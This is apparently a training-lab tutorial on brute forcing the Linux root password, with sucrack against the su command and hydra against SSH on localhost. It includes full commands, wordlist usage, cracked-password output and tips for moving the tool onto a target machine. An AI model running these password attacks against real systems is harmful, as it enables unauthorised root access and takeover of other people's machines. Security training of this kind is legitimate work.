Brute Force Root Password in Linux with Sucrack and Hydra

Introduction

In this lab, we will explore two methods and corresponding tools for obtaining the root user password through brute force attacks on Linux systems. The lab will help you understand the underlying principles and avoid common pitfalls during the process.

Using sucrack to Brute Force the Root Password via su Command

In this step, we will learn how to use the sucrack tool to brute force the root user's password through the su command.

The su command is used to switch to another user's identity on Linux systems. Except for the root user, other users need to provide the target user's password when using this command.

The tool we will use for brute forcing the su command is sucrack. sucrack is a multi-threaded Linux tool designed to brute force local user passwords through the su command.

Since the su command requires user input from a TTY shell, a simple shell script cannot accomplish the brute force attack. sucrack is written in C language and supports multi-threading, making the brute force process highly efficient.

You can check the official website of sucrack for more information.

In a real-world scenario, the target machine may not have internet access, so you can install sucrack using one of the following two methods:

Download the sucrack source code and upload it to the target machine, then compile and run it.
Download the sucrack source code, compile it locally, and then upload the compiled binary to the target machine.

In this lab, we have already installed sucrack for you.

Before attempting the brute force attack, we will set up the lab environment:

Open a terminal and navigate to the project directory:
```
cd /home/labex/project
```
Run the script env_setup_1.sh to set up the lab environment:
```
./env_setup_1.sh
```
This script switches us to the unprivileged www-data user. Our goal is to obtain the root user's password through brute force.

We have a pre-prepared wordlist at /tmp/common-wordlists.txt for demonstration purposes. You can also use your own wordlist.
The syntax for brute force attacking the su command using sucrack is:
```
sucrack -w <threads> [-u <username>] <wordlist>
```
The parameters are:
- -w: Specifies the number of threads
- <wordlist>: Specifies the wordlist file
- -u: Specifies the username to brute force. If you do not specify a username, sucrack will brute force the root user's password by default.
Let's try to brute force by running the following command:
```
sucrack -w 20 /tmp/common-wordlists.txt > ~/sucrack.log && reset
```
The output of the brute force attack is redirected to the sucrack.log file.

Note: The reset command is used to clear the terminal screen becase sometimes after using sucrack, the terminal may display not properly.
This brute force attack may take some time. After some time, check the sucrack.log file to confirm the password:
```
cat ~/sucrack.log
```
Expected output:
```
password is: really
```
Then, we can switch to the root user using:
```
su - root
```
Enter the password really to switch to the root user.
```
really
```
Create a file named success_1.txt in the /root directory to confirm that you have successfully switched to the root user:
```
echo "Success_1" > /root/success_1.txt
```
You can check the /root/success_1.txt file to confirm that you have successfully switched to the root user.

You have learned how to use sucrack to brute force the root user's password!

Using hydra to Brute Force the Root Password via SSH

In this step, we will learn how to use the hydra tool to brute force the root user's password through the SSH protocol.

With the previous step, we should still be the root user, and for this step we need to switch to the labex user. You can switch to the labex user by running the following command:

su - labex

Make sure the directory is set to /home/labex/project:
```
cd /home/labex/project
```
Run the script env_setup_2.sh to set up the lab environment:
```
./env_setup_2.sh
```
As with the previous step, after executing this script you'll switch to the www-data user.
Before attempting to brute force the SSH protocol, we need to check if the target machine allows the root user to log in via SSH. You can check this by running the following command:
```
cat /etc/ssh/sshd_config | grep -i permitrootlogin
```
If the output shows PermitRootLogin set to yes, then we can proceed with the brute force attack. Otherwise, there is no need to attempt it.
The tool we will use for brute forcing the SSH protocol is hydra. hydra is a renowned brute force tool that supports various protocols, including RDP, SMB, HTTP, MySQL, and more. hydra is pre-installed on Kali Linux and our lab's Ubuntu environment.

The syntax for brute forcing the SSH protocol using hydra is:
```
hydra -l root -P passwords.txt -t 4 -V < IP > ssh
```
The parameters are:
- -l: Specifies the username
- -P: Specifies the wordlist file
- -t: Specifies the number of threads
- -V: Displays the progress and details of the brute force attack
Let's try to brute force the root user's password using the /tmp/common-wordlists.txt wordlist and save the output to the hydra.log file:
```
hydra -l root -P /tmp/common-wordlists.txt -t 64 -V 127.0.0.1 ssh > ~/hydra.log
```
After some time, the root user's password is successfully cracked.

Check the hydra.log file to confirm the password:
```
cat ~/hydra.log
```
Example output:
```
...
[22][ssh] host: 127.0.0.1   login: root   password: penguin
1 of 1 target successfully completed, 1 valid password found
...
```
Now that we have the root user's password, we can switch to the root user by running the following command:
```
su - root
```
Enter the password penguin to switch to the root user.
```
penguin
```
You should now be the root user. You can confirm this by running the following command:
```
whoami
```
The output should be root.
Create a file named success_2.txt in the /root directory to confirm that you have successfully switched to the root user:
```
echo "Success_2" > /root/success_2.txt
```
You can check the /root/success_2.txt file to confirm that you have successfully switched to the root user.

Note: If you are using a version of hydra older than v9.0, it may report false positives when brute forcing the SSH protocol. You can check the hydra version by running hydra -v.

Summary

In this lab, we learned two methods for brute forcing the root user's password on Linux systems: via the su command using the sucrack tool, and via the SSH protocol using the hydra tool. We covered the installation, usage, and step-by-step procedures for each method, helping you understand the underlying principles and avoid common pitfalls. This lab provides valuable hands-on experience in privilege escalation techniques, which can be applied in various scenarios.